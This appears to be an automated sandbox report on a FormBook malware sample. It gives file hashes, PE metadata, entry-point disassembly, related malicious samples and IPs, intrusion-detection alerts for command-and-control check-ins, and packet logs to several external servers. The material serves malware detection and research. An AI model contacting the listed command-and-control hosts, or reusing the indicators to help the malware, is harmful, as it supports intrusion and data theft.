• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: NjjLYnPSZr.exe
Time      Type             Description
08:46:28  API Interceptor  7236279x Sleep call for process: compact.exe modified
                                                                                                        QmBe2eUtqs.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 162.55.60.2
                                                                                                        9b7dlGj5Gq.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        z10RFQ-202401.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 162.55.60.2
                                                                                                        http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                                        • 162.55.233.29
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.110.107
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.109.237
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.110.171
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.60.249
                                                                                                        No context
                                                                                                        No context
Process: C:\Windows\SysWOW64\compact.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9920892518379985
TrID:
• Win32 Executable (generic) a (10002005/4) 99.98%
• DOS Executable Generic (2002/1) 0.02%
File name: NjjLYnPSZr.exe
File size: 283'648 bytes
MD5: 8a6aa375bc5ca6ea45711462189103cb
SHA1: dfd00591e07f55a69cb29ffdba5af54bd1a4e3ea
SHA256: 2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32
SHA512: 5213242ec7f8426d68f04927f8bc12109c042a1a29b847409475ce36a70c881d9d1b3fbdfa5663d1914f628551394c1346dfa7d43b64feecdbb167cb8ae1b110
SSDEEP: 6144:t8j+I09huqxFTHY2iq1PJh8eDMhzci/HmSdY5SgnTm8MU:RI0mqfzY2iuJaeIJci/BC9iL
TLSH: 6D5422191956954BC0B6BD776C8F7046BF202E173AA32F16DDF69C2AE1680C502AF4CF
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x401590
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x57C6593E [Wed Aug 31 04:12:46 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash:
                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 00000420h
                                                                                                        push ebx
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 000003D8h
                                                                                                        xorps xmm0, xmm0
                                                                                                        lea eax, dword ptr [ebp-00000400h]
                                                                                                        push 00000000h
                                                                                                        push eax
                                                                                                        mov byte ptr [ebp-00000420h], 00000000h
                                                                                                        movq qword ptr [ebp-0000041Fh], xmm0
                                                                                                        movq qword ptr [ebp-00000417h], xmm0
                                                                                                        movq qword ptr [ebp-0000040Fh], xmm0
                                                                                                        mov dword ptr [ebp-00000407h], 00000000h
                                                                                                        mov word ptr [ebp-00000403h], 0000h
                                                                                                        mov byte ptr [ebp-00000401h], 00000000h
                                                                                                        call 00007F8464EA7BCAh
                                                                                                        add esp, 0Ch
                                                                                                        xor ebx, ebx
                                                                                                        mov eax, 00000091h
                                                                                                        mov dword ptr [ebp-04h], 0000666Ch
                                                                                                        mov dword ptr [ebp-28h], 0000292Fh
                                                                                                        mov dword ptr [ebp-24h], 00007995h
                                                                                                        mov dword ptr [ebp-20h], ebx
                                                                                                        mov dword ptr [ebp-18h], ebx
                                                                                                        mov dword ptr [ebp-0Ch], 00001CB2h
                                                                                                        mov dword ptr [ebp-10h], 000000D0h
                                                                                                        mov dword ptr [ebp-14h], 00005835h
                                                                                                        mov dword ptr [ebp-1Ch], 000062FCh
                                                                                                        mov ecx, 000002D0h
                                                                                                        mov edx, 000000FDh
                                                                                                        cmp eax, 000000FDh
                                                                                                        cmovl eax, edx
                                                                                                        dec ecx
                                                                                                        jne 00007F8464EA60C7h
                                                                                                        call 00007F8464EA7E5Fh
                                                                                                        mov dword ptr [ebp-000002ACh], eax
                                                                                                        lea eax, dword ptr [ebp-00000420h]
                                                                                                        push eax
                                                                                                        push 000019A9h
                                                                                                        Programming Language:
                                                                                                        • [C++] VS2012 build 50727
                                                                                                        • [ASM] VS2012 build 50727
                                                                                                        • [LNK] VS2012 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x44fd4 | 0x45000 | 389dad31162860987280c14d9e7d6a2f | False | 0.9890278249547102 | data | 7.995793913523369 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-10T14:46:06.642558+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | TCP
2024-10-10T14:46:22.302776+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 34.120.137.41 | 80 | TCP
2024-10-10T14:46:24.790179+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 34.120.137.41 | 80 | TCP
2024-10-10T14:46:27.343329+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49765 | 34.120.137.41 | 80 | TCP
2024-10-10T14:46:29.886009+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49783 | 34.120.137.41 | 80 | TCP
2024-10-10T14:46:35.519675+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49817 | 3.33.130.190 | 80 | TCP
2024-10-10T14:46:39.184581+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49833 | 3.33.130.190 | 80 | TCP
2024-10-10T14:46:41.731630+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49845 | 3.33.130.190 | 80 | TCP
2024-10-10T14:46:44.155602+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49860 | 3.33.130.190 | 80 | TCP
2024-10-10T14:46:49.955226+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49901 | 81.88.48.71 | 80 | TCP
2024-10-10T14:46:52.466500+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49922 | 81.88.48.71 | 80 | TCP
2024-10-10T14:46:55.114187+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49938 | 81.88.48.71 | 80 | TCP
2024-10-10T14:46:57.569118+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49954 | 81.88.48.71 | 80 | TCP
2024-10-10T14:47:03.960118+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49993 | 162.209.189.212 | 80 | TCP
2024-10-10T14:47:06.543580+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50006 | 162.209.189.212 | 80 | TCP
2024-10-10T14:47:09.117961+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 162.209.189.212 | 80 | TCP
2024-10-10T14:47:11.618796+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50020 | 162.209.189.212 | 80 | TCP
2024-10-10T14:47:17.275044+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 162.0.213.72 | 80 | TCP
2024-10-10T14:47:19.839459+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 162.0.213.72 | 80 | TCP
2024-10-10T14:47:22.358268+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 162.0.213.72 | 80 | TCP
2024-10-10T14:47:24.928033+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50024 | 162.0.213.72 | 80 | TCP
2024-10-10T14:47:30.763063+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 104.21.21.230 | 80 | TCP
2024-10-10T14:47:33.338917+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 104.21.21.230 | 80 | TCP
2024-10-10T14:47:36.343667+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 104.21.21.230 | 80 | TCP
2024-10-10T14:47:38.379854+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50028 | 104.21.21.230 | 80 | TCP
2024-10-10T14:47:44.012329+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 84.32.84.32 | 80 | TCP
2024-10-10T14:47:46.589247+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 84.32.84.32 | 80 | TCP
2024-10-10T14:47:49.136453+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 84.32.84.32 | 80 | TCP
2024-10-10T14:47:51.684273+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50032 | 84.32.84.32 | 80 | TCP
2024-10-10T14:47:57.431921+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 109.234.166.180 | 80 | TCP
2024-10-10T14:47:59.963184+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 109.234.166.180 | 80 | TCP
2024-10-10T14:48:02.639515+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 109.234.166.180 | 80 | TCP
2024-10-10T14:48:05.336208+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50036 | 109.234.166.180 | 80 | TCP
2024-10-10T14:48:10.886896+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | TCP
2024-10-10T14:48:13.527787+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | TCP
2024-10-10T14:48:16.087396+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | TCP
2024-10-10T14:48:18.611444+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | TCP
2024-10-10T14:48:25.616555+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51587 | 118.99.50.8 | 80 | TCP
2024-10-10T14:48:28.080678+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51588 | 118.99.50.8 | 80 | TCP
2024-10-10T14:48:30.686701+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51589 | 118.99.50.8 | 80 | TCP
2024-10-10T14:48:33.197843+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 51590 | 118.99.50.8 | 80 | TCP
2024-10-10T14:48:41.113723+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51591 | 23.249.190.35 | 80 | TCP
2024-10-10T14:48:43.444739+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51592 | 23.249.190.35 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 14:46:06.181518078 CEST | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Oct 10, 2024 14:46:06.186520100 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Oct 10, 2024 14:46:06.186619043 CEST | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Oct 10, 2024 14:46:06.194684029 CEST | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Oct 10, 2024 14:46:06.199543953 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Oct 10, 2024 14:46:06.642410994 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Oct 10, 2024 14:46:06.642437935 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Oct 10, 2024 14:46:06.642558098 CEST | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Oct 10, 2024 14:46:06.645286083 CEST | 49736 | 80 | 192.168.2.4 | 3.33.130.190
Oct 10, 2024 14:46:06.650268078 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.4
Oct 10, 2024 14:46:21.755731106 CEST | 49738 | 80 | 192.168.2.4 | 34.120.137.41
Oct 10, 2024 14:46:21.760624886 CEST | 80 | 49738 | 34.120.137.41 | 192.168.2.4
Oct 10, 2024 14:46:21.760724068 CEST | 49738 | 80 | 192.168.2.4 | 34.120.137.41
Oct 10, 2024 14:46:21.770148993 CEST | 49738 | 80 | 192.168.2.4 | 34.120.137.41
Oct 10, 2024 14:46:21.775001049 CEST | 80 | 49738 | 34.120.137.41 | 192.168.2.4
Oct 10, 2024 14:46:22.302696943 CEST | 80 | 49738 | 34.120.137.41 | 192.168.2.4
Oct 10, 2024 14:46:22.302711964 CEST | 80 | 49738 | 34.120.137.41 | 192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302725077 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302776098 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:23.282543898 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.311988115 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.317013025 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.317114115 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.326073885 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.331003904 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790009975 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790128946 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790179014 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:25.840585947 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.858839035 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.863760948 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.863878012 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.874218941 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.879121065 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879146099 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879154921 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879162073 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879173994 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879189968 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879319906 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879328012 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879338026 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343168020 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343203068 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343328953 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:28.387687922 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.407427073 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.412369967 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.412446976 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.419471979 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.424523115 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.885693073 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.885814905 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.886008978 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.888672113 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.893709898 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.035867929 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.040795088 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.040885925 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.065460920 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.070396900 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.519593954 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.519675016 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:36.575144053 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:36.580301046 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:37.652154922 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.657318115 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:37.657403946 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.680917978 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.686099052 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:39.184581041 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:39.189860106 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:39.189944983 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.204555988 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.209402084 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.209521055 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.225322962 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.230386019 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230426073 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230438948 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230451107 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230463028 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230473995 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230539083 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230561018 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230572939 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:41.731630087 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:41.736900091 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:41.737051964 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.751462936 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.756419897 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:42.756489992 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.764571905 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.769653082 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155246973 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155513048 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155601978 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:44.157810926 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:44.162704945 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.241404057 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.246407032 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.247492075 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.258930922 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.263747931 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.954166889 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.955131054 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.955225945 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:50.763029099 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.781935930 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.787501097 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:51.787617922 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.800765038 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.805702925 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.465985060 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.466423035 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.466500044 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:53.310017109 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.329767942 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.334880114 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.335001945 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.347877026 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.353038073 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353082895 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353111029 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353163958 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353190899 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353218079 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353245020 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353271008 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353297949 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.113912106 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.114115953 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.114187002 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:55.857050896 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.875766993 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.880667925 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:56.880743027 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.889822006 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.894702911 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.568619967 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.568883896 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.569118023 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:57.572877884 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:57.577703953 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.449110985 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.454005957 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.454101086 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.468956947 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.473886967 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.958451986 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.960042953 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.960118055 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:04.982101917 CEST4999380192.168.2.4162.209.189.212
